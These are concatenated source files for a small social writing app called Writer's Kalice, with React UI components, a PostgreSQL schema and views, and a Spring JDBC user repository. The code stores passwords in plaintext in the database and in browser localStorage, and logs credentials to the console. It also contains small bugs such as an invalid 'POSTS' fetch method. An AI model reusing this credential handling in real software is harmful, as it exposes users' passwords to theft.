<DialogTitle id="form-dialog-title">Send view request</DialogTitle>
<DialogContent>
<DialogContentText>
Enter the username of the person you want to send this post to:
</DialogContentText>
<TextField
onChange={this.handleOptions}
autoFocus
margin="dense"
name="sendVrToUsername"
id="sendVrToUsername"
label="Send to? (username)"
variant="outlined"
fullWidth
/>
</DialogContent>
<DialogActions>
<Button onClick={() => this.handleSendVR()} color="primary">
Send
</Button>
<Button onClick={() => { this.setState({vrDialogOpen: false}) }} color="primary">
Cancel
</Button>
</DialogActions>
</Dialog>
</div>
</div>
);
}
}<file_sep>-- TABLE CREATION FOR WRITER'S KALICE DB
-- NOTE:
-- Prefill test - Prefill for testing purposes
-- Prefill test opt - Prefill for testing purposes, but optional
-- Prefill all init - Prefill all data for initialization of system
-- Prefill some init - Prefill some data for initialization of system
-- INSERTS: Prefill test
CREATE TABLE users_table (
user_id SERIAL UNIQUE NOT NULL,
username VARCHAR(20) UNIQUE NOT NULL,
join_date DATE NOT NULL,
security_qn VARCHAR(100) NOT NULL,
security_ans VARCHAR(40) NOT NULL,
privacy_det_id INTEGER NOT NULL,
CONSTRAINT user_id_pk PRIMARY KEY (user_id)
);
-- INSERTS: Prefill test
CREATE TABLE user_email_ids (
user_id INTEGER,
email VARCHAR,
CONSTRAINT user_id_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT user_email_pk PRIMARY KEY (user_id, email)
);
-- INSERTS: Prefill test
CREATE TABLE auth_helper_passes (
passwd VARCHAR(30) UNIQUE NOT NULL,
half_key VARCHAR(30) NOT NULL,
CONSTRAINT auth_helper_pass_pk PRIMARY KEY (passwd, half_key)
);
-- INSERTS: Prefill test
CREATE TABLE auth_helper_userauths (
user_id INTEGER NOT NULL,
auth_id SERIAL NOT NULL,
passwd VARCHAR NOT NULL,
CONSTRAINT auth_helper_userauth_pk PRIMARY KEY (user_id, auth_id),
CONSTRAINT passwd_fk FOREIGN KEY (passwd) REFERENCES auth_helper_passes(passwd),
CONSTRAINT user_id_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id)
);
-- INSERTS: Prefill all init
CREATE TABLE ranks (
rank_id SERIAL PRIMARY KEY,
description VARCHAR(20) NOT NULL, -- Newbie, rookie, etc.
num_stars FLOAT NOT NULL
);
-- INSERT INTO ranks VALUES (0, 'Starter', 0);
-- INSERTS: Prefill test
CREATE TABLE profiles (
user_id INTEGER UNIQUE NOT NULL,
name VARCHAR NOT NULL,
about_me VARCHAR NULL,
is_above_eighteen BOOLEAN NOT NULL,
npos_reacts INTEGER NOT NULL DEFAULT 0,
profile_pic_url TEXT NOT NULL DEFAULT '',
rank_id INTEGER NOT NULL DEFAULT 0,
CONSTRAINT profile_pk PRIMARY KEY (user_id, name),
CONSTRAINT profile_rank_fk FOREIGN KEY (rank_id) REFERENCES ranks(rank_id)
);
-- INSERTS: Prefill all init
CREATE TABLE privacy_details (
detail_id SERIAL PRIMARY KEY,
show_interests BOOLEAN NOT NULL,
show_name BOOLEAN NOT NULL,
show_bio BOOLEAN NOT NULL
);
ALTER TABLE users_table ADD CONSTRAINT privacy_fk FOREIGN KEY (privacy_det_id) REFERENCES privacy_details(detail_id);
-- INSERTS: Prefill some init
CREATE TABLE interest_tags (
interest_id SERIAL PRIMARY KEY,
description VARCHAR(30) NOT NULL
);
-- INSERTS: Prefill test
CREATE TABLE profile_interests (
user_id INTEGER NOT NULL,
name VARCHAR NOT NULL,
interest_id INTEGER NOT NULL,
CONSTRAINT profile_interests_pk PRIMARY KEY (user_id, name, interest_id),
CONSTRAINT interest_fk FOREIGN KEY (interest_id) REFERENCES interest_tags(interest_id)
);
-- INSERTS: Prefill test
CREATE TABLE posts (
post_id SERIAL PRIMARY KEY,
title TEXT NOT NULL DEFAULT '',
content TEXT NOT NULL,
anonymous BOOLEAN NOT NULL,
min_rank INTEGER NOT NULL,
expiry_date DATE NULL,
posted_date DATE NOT NULL,
is_above_eighteen BOOLEAN NOT NULL,
postedby_uid INTEGER NOT NULL,
CONSTRAINT postedby_fk FOREIGN KEY (postedby_uid) REFERENCES users_table(user_id),
CONSTRAINT date_ck CHECK (posted_date > expiry_date),
CONSTRAINT rank_ck CHECK (min_rank >= 0) -- TODO: check upper limit too
);
-- INSERTS: Prefill test opt
CREATE TABLE view_requests (
from_user_id INTEGER NOT NULL,
to_user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
sent_date_time TIMESTAMP WITH TIME ZONE NOT NULL,
CONSTRAINT view_requests_pk PRIMARY KEY (from_user_id, to_user_id, post_id, sent_date_time),
CONSTRAINT from_uid_fk FOREIGN KEY (from_user_id) REFERENCES users_table(user_id),
CONSTRAINT to_uid_fk FOREIGN KEY (to_user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE saved_posts (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
CONSTRAINT saved_posts_pk PRIMARY KEY (user_id, post_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE seen_posts (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
CONSTRAINT seen_posts_pk PRIMARY KEY (user_id, post_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE reactions (
reaction_id SERIAL PRIMARY KEY,
description VARCHAR NOT NULL,
pos_neg VARCHAR(9) NOT NULL,
CONSTRAINT pos_neg_ck CHECK (pos_neg in ('positive', 'negative'))
);
-- INSERTS: Prefill test opt
CREATE TABLE post_reactions (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
reaction_id INTEGER NOT NULL,
anonymous BOOLEAN NOT NULL DEFAULT FALSE,
CONSTRAINT post_reactions_pk PRIMARY KEY (user_id, post_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id),
CONSTRAINT reaction_id FOREIGN KEY (reaction_id) REFERENCES reactions(reaction_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE comments (
comment_id SERIAL PRIMARY KEY,
content TEXT NOT NULL,
posted_dt_tm TIMESTAMPTZ NOT NULL,
anonymous BOOLEAN NOT NULL DEFAULT FALSE
);
-- INSERTS: Prefill test opt, with comments
CREATE TABLE comment_text_pos_neg (
content TEXT PRIMARY KEY,
pos_neg VARCHAR(9) NOT NULL,
-- CONSTRAINT comment_text_pos_neg_fk FOREIGN KEY (content) REFERENCES comments(content),
CONSTRAINT pos_neg_ck CHECK (pos_neg in ('positive', 'negative'))
);
-- INSERTS: Prefill test opt, with comments and posts
CREATE TABLE post_comments (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
comment_id INTEGER NOT NULL,
CONSTRAINT post_comments_pk PRIMARY KEY (user_id, post_id, comment_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY (post_id) REFERENCES posts(post_id),
CONSTRAINT comment_fk FOREIGN KEY (comment_id) REFERENCES comments(comment_id)
);
-- INSERTS: Prefill test, with posts
CREATE TABLE post_interests (
post_id INTEGER NOT NULL,
interest_id INTEGER NOT NULL,
CONSTRAINT post_interests_pk PRIMARY KEY (post_id, interest_id),
CONSTRAINT post_fk FOREIGN KEY (post_id) REFERENCES posts(post_id),
CONSTRAINT interest_fk FOREIGN KEY (interest_id) REFERENCES interest_tags(interest_id)
);
<file_sep>package com.writerskalice.server.models.postmodels;
import lombok.AllArgsConstructor;
import lombok.Data;
import lombok.NoArgsConstructor;
@Data
@NoArgsConstructor
@AllArgsConstructor
public class ReactOnPostData {
private Integer reactedbyUid;
private Integer reactedonPid;
private Integer reactionId;
}
<file_sep>package com.writerskalice.server.models.postmodels;
import lombok.AllArgsConstructor;
import lombok.Data;
import lombok.NoArgsConstructor;
import java.util.ArrayList;
@Data
@NoArgsConstructor
@AllArgsConstructor
public class CreatePostData {
private String title;
private String content;
private Boolean isAboveEighteen;
private ArrayList<Integer> tags;
private Integer postedbyUid;
private Boolean anonymous;
}
<file_sep>
-- /posts/getPost
-- can also be used for /posts/getNewPosts
CREATE OR REPLACE VIEW posts_postedby_uname AS
SELECT p.post_id as post_id, ut.username as postedby_username
FROM posts p
LEFT JOIN users_table ut on p.postedby_uid = ut.user_id;
CREATE OR REPLACE VIEW getpost_view_com_rcn_int AS
SELECT interm_no_interests.post_id as post_id, content, title, anonymous,
min_rank, expiry_date, posted_date,
is_above_eighteen, postedby_uid, postedby_username,
n_comments, n_pos_rcn, n_neg_rcn
FROM (
(
SELECT p.post_id as post_id, p.content as content, p.title as title,
p.anonymous as anonymous, min_rank, expiry_date, posted_date,
is_above_eighteen, postedby_uid,
COALESCE(COUNT(pcom.comment_id), 0) as n_comments,
COALESCE(SUM(
CASE rcn.pos_neg
WHEN 'positive' THEN 1
ELSE 0
END
), 0) AS n_pos_rcn,
COALESCE(SUM (
CASE rcn.pos_neg
WHEN 'negative' THEN 1
ELSE 0
END
), 0) AS n_neg_rcn
FROM reactions rcn
RIGHT JOIN post_reactions prcn ON prcn.reaction_id = rcn.reaction_id
RIGHT JOIN posts p ON p.post_id = prcn.post_id
RIGHT JOIN post_comments pcom ON p.post_id = pcom.post_id
GROUP BY p.post_id
)
AS interm_no_interests
LEFT JOIN posts_postedby_uname
ON interm_no_interests.post_id = posts_postedby_uname.post_id
)
LEFT JOIN post_interests pint ON interm_no_interests.post_id = pint.post_id
WHERE posts_postedby_uname.post_id = interm_no_interests.post_id;
insert into post_reactions values (2, 1, 1, false);
-- /posts/getComments
-- Note: This view DOES NOT join the posts table.
drop view get_comments;
CREATE OR REPLACE VIEW get_comments AS
SELECT pc.post_id, pc.user_id as postedby_uid, ut.username as postedby_username,
c.content, c.anonymous, c.posted_dt_tm
FROM users_table ut
RIGHT JOIN post_comments pc ON pc.user_id = ut.user_id
LEFT JOIN comments c ON pc.comment_id = c.comment_id;
-- /posts/getSavedPosts
CREATE OR REPLACE VIEW get_saved_posts AS
SELECT ut.user_id, gpv.post_id, content, title, anonymous,
min_rank, expiry_date, posted_date, postedby_uid, postedby_username,
n_comments, n_pos_rcn, n_neg_rcn
FROM users_table ut
LEFT JOIN seen_posts sp ON ut.user_id = sp.user_id
LEFT JOIN getpost_view_com_rcn_int gpv ON sp.post_id = gpv.post_id;
-- /posts/getReactionDetails (Inactive for now)
-- Note: This view DOES NOT join the posts table.
CREATE OR REPLACE VIEW get_reactions AS
SELECT pr.post_id as post_id, r.reaction_id as reaction_id, r.description as description,
(CASE r.pos_neg WHEN 'positive' THEN TRUE ELSE FALSE END) as positivity
FROM post_reactions pr
LEFT JOIN reactions r ON pr.reaction_id = r.reaction_id;
-- /posts/getInterestTags
CREATE OR REPLACE VIEW posts_get_interest_tags AS
SELECT pi.post_id as post_id, pi.interest_id as interest_id, description
FROM post_interests pi
LEFT JOIN interest_tags it on pi.interest_id = it.interest_id;
-- /user/profileDisplay
CREATE OR REPLACE VIEW profile_info AS
SELECT user_id, name, about_me, p.rank_id as rank_id, r.num_stars as num_stars,
r.description as rank_desc
FROM profiles p
LEFT JOIN ranks r ON p.rank_id = r.rank_id;
CREATE OR REPLACE VIEW user_privacy AS
SELECT user_id, show_interests, show_name, show_bio, username
FROM users_table ut
LEFT JOIN privacy_details pd on ut.privacy_det_id = pd.detail_id;
CREATE OR REPLACE VIEW profile_display AS
SELECT pi.user_id as user_id, name, about_me, rank_id, num_stars,
rank_desc, show_interests, show_name, show_bio, username
FROM profile_info pi
LEFT JOIN user_privacy up on pi.user_id = up.user_id;
-- /user/getInterestTags
CREATE OR REPLACE VIEW user_get_interest_tags AS
SELECT pi.user_id as user_id, pi.interest_id as interest_id, description
FROM profile_interests pi
LEFT JOIN interest_tags it on pi.interest_id = it.interest_id;<file_sep>package com.writerskalice.server.dao;
import com.writerskalice.server.models.getmodels.UserDisplayProfile;
import com.writerskalice.server.models.getmodels.UserProfileSettings;
import com.writerskalice.server.models.postmodels.CreateUserProfileData;
import com.writerskalice.server.models.postmodels.UpdateProfileData;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.stereotype.Repository;
import org.springframework.transaction.annotation.Transactional;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.HashMap;
import java.util.Map;
@Repository
public class UserRepository implements IUserDao {
@Autowired
private JdbcTemplate jdbcTemplate;
@Override
public UserDisplayProfile retrieveUserDisplay(String username) {
System.out.println("Hello hello!");
Integer userId = jdbcTemplate.queryForObject("select user_id from users_table where username = ?",
new Object[]{username}, (rs, rn) -> rs.getInt(1));
System.out.println(userId);
Map<String, Object> res =
jdbcTemplate.queryForObject("select name, username, rank_id, rank_desc, num_stars, about_me as bio, show_name, show_bio, show_interests " +
"from profile_display " + "where user_id = ?;", new Object[]{userId},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("name", rs.getString(1));
resultMap.put("username", rs.getString(2));
resultMap.put("rankId", rs.getInt(3));
resultMap.put("rankDesc", rs.getString(4));
resultMap.put("numStars", rs.getFloat(5));
resultMap.put("bio", rs.getString(6));
resultMap.put("showName", rs.getBoolean(7));
resultMap.put("showBio", rs.getBoolean(8));
resultMap.put("showInterests", rs.getBoolean(9));
return resultMap;
});
System.out.println(res);
UserDisplayProfile profile = new UserDisplayProfile();
profile.setName((String) res.get("name"));
profile.setUsername((String) res.get("username"));
profile.setBio((String) res.get("bio"));
profile.setRank((Integer) res.get("rankId"));
profile.setNumStars((Float) res.get("numStars"));
profile.setRankDesc((String) res.get("rankDesc"));
profile.setShowBio((Boolean) res.get("showBio"));
profile.setShowName((Boolean) res.get("showName"));
profile.setShowInterests((Boolean) res.get("showInterests"));
System.out.println("Hello hello!");
if (profile.getName() == null) {
System.out.println("null name");
}
System.out.println(profile.getName());
return profile;
}
@Override
public UserProfileSettings retrieveUserProfileSettings(Integer uid) {
Map<String, Object> res =
jdbcTemplate.queryForObject("select name, about_me as bio, rank_id, rank_desc, num_stars, show_name, show_bio, show_interests " +
"from profile_display where user_id = ?;", new Object[]{uid},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("name", rs.getString(1));
resultMap.put("bio", rs.getString(2));
resultMap.put("rankId", rs.getInt(3));
resultMap.put("rankDesc", rs.getString(4));
resultMap.put("numStars", rs.getFloat(5));
resultMap.put("showName", rs.getBoolean(6));
resultMap.put("showBio", rs.getBoolean(7));
resultMap.put("showInterests", rs.getBoolean(8));
return resultMap;
});
UserProfileSettings profileSettings = new UserProfileSettings();
profileSettings.setName((String) res.get("name"));
profileSettings.setBio((String) res.get("bio"));
profileSettings.setRank((Integer) res.get("rankId"));
profileSettings.setNumStars((Float) res.get("numStars"));
profileSettings.setRankDesc((String) res.get("bio"));
profileSettings.setShowBio((Boolean) res.get("showBio"));
profileSettings.setShowName((Boolean) res.get("showName"));
profileSettings.setShowInterests((Boolean) res.get("showInterests"));
Map<String, Object> res2 =
jdbcTemplate.queryForObject("select email from user_email_ids where user_id = ?;",
new Object[]{uid},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("email", rs.getString(1));
return resultMap;
});
Map<String, Object> res3 =
jdbcTemplate.queryForObject("select is_above_eighteen from profiles where user_id = ?;",
new Object[]{uid},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("isAboveEighteen", rs.getBoolean(1));
return resultMap;
});
profileSettings.setEmail((String) res2.get("email"));
profileSettings.setIsAboveEighteen((Boolean) res3.get("isAboveEighteen"));
return profileSettings;
}
@Override
@Transactional
public Map<String, Object> createUserProfile(CreateUserProfileData data) {
/*Integer privacyId = jdbcTemplate.queryForObject("select detail_id from privacy_details " +
"where show_interests = ? and show_name = ? and show_bio = ?",
new Object[]{data.getShowInterestTags(), data.getShowName(), data.getShowBio()},
(rs, rn) -> rs.getInt(1));*/
Integer privacyId = 1;
System.out.println(privacyId);
DateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd");
java.util.Date date = new java.util.Date();
Boolean success = true;
System.out.println("Recs inserted: ");
System.out.println(jdbcTemplate.update("insert into users_table(username, join_date, security_qn, security_ans, privacy_det_id)" +
" values (?, ?, ?, ?, ?)",
data.getUsername(), date, '-', '-', privacyId));
Integer userId = jdbcTemplate.queryForObject("select user_id from users_table where username = ?",
new Object[]{data.getUsername()}, (rs, rn) -> rs.getInt(1));
System.out.println(jdbcTemplate.update("insert into user_email_ids values (?, ?);",
userId, data.getEmail()));
success = (jdbcTemplate.update("insert into profiles(user_id, name, about_me, is_above_eighteen) values (?, ?, ?, ?)",
userId, data.getName(), data.getBio(), data.getIsAboveEighteen()) > 0) && success;
success = (jdbcTemplate.update("insert into auth_helper_userauths(user_id, passwd) values (?, ?)",
userId, data.getPassword()) > 0) && success;
// Now for profile interests
for (Integer tagId : data.getTags()) {
success = (jdbcTemplate.update("insert into profile_interests values (?, ?, ?)", userId, data.getName(), tagId) > 0) && success;
}
Map<String, Object> results = new HashMap<>();
results.put("userId", userId);
results.put("success", success);
return results;
}
@Override
public Boolean updateUserProfile(UpdateProfileData data) {
Integer privacyId = jdbcTemplate.queryForObject("select detail_id from privacy_details " +
"where show_interests = ? and show_name = ? and show_bio = ?",
new Object[]{data.getShowInterestTags(), data.getShowName(), data.getShowBio()},
(rs, rn) -> rs.getInt(1));
Boolean success;
success = jdbcTemplate.update("update users_table set username = ?, privacy_det_id = ? " +
" where user_id = ?;",
data.getUsername(), privacyId, data.getUid()) > 0;
success = (jdbcTemplate.update("update user_email_ids set email = ? where user_id = ?;",
data.getEmail(), data.getUid()) > 0) && success;
success = (jdbcTemplate.update("update profiles set name = ?, about_me = ?, is_above_eighteen = ? " +
"where user_id = ? and name = ?",
data.getName(), data.getBio(), data.getIsAboveEighteen(), data.getUid(), data.getName()) > 0)
&& success;
success = (jdbcTemplate.update("update auth_helper_userauths set passwd = ? where user_id = ?",
data.getPassword(), data.getUid()) > 0) && success;
// Now for profile interests
// First delete the existing tags, then re-insert
success = (jdbcTemplate.update("delete from profile_interests where user_id = ?", data.getUid()) > 0) && success;
for (Integer tagId : data.getTags()) {
success = (jdbcTemplate.update("insert into profile_interests values (?, ?, ?)", data.getUid(), data.getName(), tagId) > 0) && success;
}
return success;
}
@Override
public Map<String, Object> checkUserCreds(String username, String password) {
Integer userId = jdbcTemplate.queryForObject("select user_id from users_table where username = ?",
new Object[]{username}, (rs, rn) -> rs.getInt(1));
String passdb = jdbcTemplate.queryForObject("select passwd from auth_helper_userauths where user_id = ?",
new Object[]{userId},
(rs, rn) -> rs.getString(1));
assert passdb != null;
Boolean success = passdb.equals(password);
Map<String, Object> res = new HashMap<>();
res.put("userId", userId);
res.put("success", success);
return res;
}
}
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import { useHistory } from 'react-router-dom';
import serverUrl from "./appconfig";
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
class Tag extends React.Component {
constructor(props) {
super(props);
}
render() {
return (
<div className="inline-block mb-3 mr-2"><span className="inline-block py-1 px-3 rounded bg-gray-800 text-gray-500 text-xs font-medium tracking-widest">{this.props.tagName}</span></div>
);
}
}
class Post extends React.Component {
constructor(props) {
super(props);
console.log(this.props.feedType);
// process the content to show a truncated content
var string = this.props.content.replace('\n', " ");
var length = 305;
var processedContent = string.length > length ?
string.substring(0, length - 3) + "..." : string;
// process the title to show a truncated title
length = 55;
string = this.props.title;
var processedTitle = string.length > length ?
string.substring(0, length - 3) + "..." : string;
this.state = {
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
content: processedContent,
title: processedTitle
};
this.handleReadMore = this.handleReadMore.bind(this);
}
handleReadMore() {
if (this.props.feedType == true)
fetch(serverUrl + "/posts/setseen", {
method: 'POSTS',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.id,
})
})
}
render() {
return (
<div className="p-12 md:w-1/2 flex flex-col items-start border-dashed">
<h2 className="sm:text-3xl text-2xl title-font font-medium text-white mt-4 mb-4">{this.state.title}</h2>
<p className="leading-relaxed mb-4">{this.state.content}</p>
<div
className="flex flex-col items-start flex-wrap pb-4 mb-4 border-b-2 border-gray-800 mt-auto w-full">
<Link to={{
pathname: '/post',
query: {postId: this.props.id, fromFeed: this.props.feedType}
}} className="text-purple-500 inline-flex items-center mb-8">Read
<svg className="w-4 h-4 ml-2" viewBox="0 0 24 24" stroke="currentColor"
stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round">
<path d="M5 12h14"></path>
<path d="M12 5l7 7-7 7"></path>
</svg>
</Link>
<div className="grid-flow-row">
{this.props.tags.map((tag) =>
<div className="inline-block mb-3 mr-2"><span className="inline-block py-1 px-3 rounded bg-gray-800 text-gray-500 text-xs font-medium tracking-widest">{tag.replace("_", " ").toUpperCase()}</span></div>
)}
</div>
<div className="text-gray-600 mr-3 inline-flex items-center ml-auto leading-none text-sm">
<span
className="text-gray-600 mr-3 inline-flex items-center ml-auto leading-none text-sm pr-3 py-1 border-r-2 border-gray-800">
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M14 10h4.764a2 2 0 011.789 2.894l-3.5 7A2 2 0 0115.263 21h-4.017c-.163 0-.326-.02-.485-.06L7 20m7-10V5a2 2 0 00-2-2h-.095c-.5 0-.905.405-.905.905 0 .714-.211 1.412-.608 2.006L7 11v9m7-10h-2M7 20H5a2 2 0 01-2-2v-6a2 2 0 012-2h2.5">
</path>
</svg>{this.props.nPosReactions}
<span className="ml-4"></span>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 14H5.236a2 2 0 01-1.789-2.894l3.5-7A2 2 0 018.736 3h4.018a2 2 0 01.485.06l3.76.94m-7 10v5a2 2 0 002 2h.096c.5 0 .905-.405.905-.904 0-.715.211-1.413.608-2.008L17 13V4m-7 10h2m5-10h2a2 2 0 012 2v6a2 2 0 01-2 2h-2.5">
</path>
</svg>{this.props.nNegReactions}
</span>
<span className="text-gray-600 inline-flex items-center leading-none text-sm">
<svg className="w-4 h-4 mr-1" stroke="currentColor" stroke-width="2" fill="none"
stroke-linecap="round" stroke-linejoin="round" viewBox="0 0 24 24">
<path
d="M21 11.5a8.38 8.38 0 01-.9 3.8 8.5 8.5 0 01-7.6 4.7 8.38 8.38 0 01-3.8-.9L3 21l1.9-5.7a8.38 8.38 0 01-.9-3.8 8.5 8.5 0 014.7-7.6 8.38 8.38 0 013.8-.9h.5a8.48 8.48 0 018 8v.5z">
</path>
</svg>{this.props.nComments}
</span>
</div>
</div>
<a className="inline-flex items-center">
<span className="flex-grow flex flex-col pl-4">
<span className="title-font font-medium text-white">{this.props.viewReqType ? ('Author: ' + (this.props.anonymous ? 'anonymous' : this.props.postedbyUsername) + ', sent by ' + this.props.sentbyUsername) : (this.props.anonymous ? '<anonymous>' : this.props.postedbyUsername) }</span>
</span>
</a>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}
export default Post;<file_sep>import React from 'react';
import serverUrl from './appconfig';
import { Link, Redirect } from 'react-router-dom';
import logo from './public/assets/logo.png';
//import './App.css';
import './css/build/tailwind.css';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import { useHistory } from 'react-router-dom';
import Feed from './ViewRequestsPage';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
function Landing() {
var username = '';
var halfkey = '';
var password = '';
if (window.localStorage) {
username = window.localStorage.getItem('wKusername');
password = window.<PASSWORD>.getItem('<PASSWORD>');
}
console.log(username)
console.log(password)
if (username == '' || username == null || password == '' || password == null) {
return new SignInPage();
}
else {
return <Redirect to="/feed" />
}
}
class SignInPage extends React.Component {
constructor(props) {
super(props);
this.state = {
username: '',
password: '',
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleSubmit = this.handleSubmit.bind(this);
this.handleChange = this.handleChange.bind(this);
}
handleSubmit() {
if (!this.state.username || !this.state.password) {
this.setState({
errorText: 'Please enter the password and username!',
failedSnkOpen: true,
});
return;
}
if (window.localStorage) {
console.log(JSON.stringify({ username: this.state.username, password: <PASSWORD> }));
fetch(serverUrl + "/users/checksignin", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ password: <PASSWORD>, username: this.state.username })
}).then(response => {
if (response.status == 200) {
window.localStorage.setItem('wKusername', this.state.username);
window.localStorage.setItem('wKpassword', <PASSWORD>.password);
response.json().then((data) => {
console.log(data)
if (data.success) {
window.localStorage.setItem('wKuid', data.userId);
this.setState({
successText: 'Signed in successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);
}
else {
this.setState({
errorText: 'Invalid username/password!',
failedSnkOpen: true,
});
}
});
}
else if (response.status == 401) {
this.setState({
errorText: 'Invalid username/password!',
failedSnkOpen: true,
});
}
}).catch(() => {
});
}
//window.localStorage.setItem('wKuid', data.userId);
/*this.setState({
successText: 'Signed in successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);*/
}
handleChange(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
render() {
return (
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-2 sm:px-6 lg:px-8">
<div className="relative flex items-center justify-between h-16">
<div className="absolute inset-y-0 left-0 flex items-center sm:hidden">
{/* Mobile menu button*/}
</div>
<div className="flex-1 flex items-center justify-center sm:items-stretch sm:justify-start">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden sm:block sm:ml-6">
</div>
</div>
<div className="absolute inset-y-0 right-0 flex items-center pr-2 sm:static sm:inset-auto sm:ml-6 sm:pr-0">
<button className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700 transition duration-150 ease-in-out" aria-label="Notifications">
{/* Heroicon name: bell */}
</button>
{/* Profile dropdown */}
<div className="ml-3 relative">
<div>
</div>
{/*
Profile dropdown panel, show/hide based on dropdown state.
Entering: "transition ease-out duration-100"
From: "transform opacity-0 scale-95"
To: "transform opacity-100 scale-100"
Leaving: "transition ease-in duration-75"
From: "transform opacity-100 scale-100"
To: "transform opacity-0 scale-95"
*/}
<div className="hidden origin-top-right absolute right-0 mt-2 w-48 rounded-md shadow-lg">
</div>
</div>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Menu open: "block", Menu closed: "hidden"
*/}
<div className="hidden sm:hidden">
</div>
</nav>
<main className="flex-grow">
<section className="text-gray-500 bg-gray-900 body-font">
<div className="container px-5 py-24 mx-auto flex flex-wrap items-center">
<div className="lg:w-3/5 md:w-1/2 md:pr-16 lg:pr-0 pr-0">
<h1 className="title-font font-semibold text-3xl text-white">The outlet for all your creative ideas and literary grace isn't just the diary.</h1>
<p className="leading-relaxed mt-4">Ever thought of wanting to share all those ideas popping in your
head? All those ideas that pop up into your head in the shower, or while dining alone?
Well, now you have a platform to share all that with the world.
<br /><p className="leading-relaxed mt-4">Because we all know that a <i>diary</i> just isn't the place deserved by your magnificent ideas.</p>
<p className="mt-4"></p><span className="text-indigo-500 font-semibold">Writer's Kalice</span> is the place for the literary genius that hides within you that never stepped out of the lonely confines of your diary till now. </p>
</div>
<div className="lg:w-2/6 md:w-1/2 bg-gray-800 rounded-lg p-8 flex flex-col md:ml-auto w-full mt-10 md:mt-0">
<h2 className="text-white text-lg font-medium title-font mb-5">Sign In</h2>
<input className="bg-gray-900 rounded border font-mono tracking-widest text-white border-gray-900 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4" placeholder="Username" type="text" name="username" onChange={this.handleChange} />
<input type="password" className="bg-gray-900 tracking-widest rounded border font-mono text-white border-gray-900 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4" placeholder="<PASSWORD>" name="password" onChange={this.handleChange} />
<p><br /><br /></p>
